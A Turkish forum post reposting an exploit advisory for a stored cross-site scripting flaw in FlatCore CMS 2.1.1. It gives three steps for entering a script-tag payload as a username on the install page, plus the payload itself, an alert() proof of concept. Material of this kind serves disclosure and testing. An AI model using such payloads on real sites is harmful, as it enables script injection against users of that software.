Hoşgeldin Misafir

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting Vulnerability

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://flatcore.org/
# Version: 2.1.1
# Tested on: Windows & XAMPP
 
==> Tutorial <==
 
1- Go to the following url. => http://(HOST)/install/index.php
2- Write XSS Payload into the username of the user account.
3- Press "Save" button.
 
XSS Payload ==> "<script>alert("usernameXSS")</script>
 
#  0day.today [2023-04-16]  #